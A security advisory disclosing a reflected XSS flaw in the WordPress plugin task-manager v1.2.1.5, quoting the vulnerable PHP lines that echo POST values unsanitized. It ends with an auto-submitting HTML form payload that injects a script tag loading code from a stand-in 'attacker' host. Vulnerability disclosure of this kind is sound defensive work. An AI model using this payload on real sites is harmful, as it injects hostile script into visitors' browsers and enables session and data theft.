Advisory #: 1335
Title: Reflected XSS in wordpress plugin task-manager v1.2.1.5
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/task-manager
Downloads: 291
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: task-manager
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./task-manager/module/wpeo_point/template/frontend/window.php: 12: <input type="hidden" name="point_time[post_id]" value="<?php echo $_POST['task_id']; ?>" /> 13: <input type="hidden" name="point_time[parent_id]" value="<?php echo $_POST['point_id']; ?>" /> The variable task_id appears to send unsanitized data back to the users browser via POST request.
CVE-ID: Not Released
File:./task-manager/module/wpeo_point/template/frontend/window.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. XSS POST exploit modified from http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html
  3. <form name=TheForm action=http://[target]/wp-content/plugins/task-manager/module/wpeo_point/template/frontend/window.php method=post> <input type=hidden name=task_id value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;> </form> <script> document.TheForm.submit(); </script>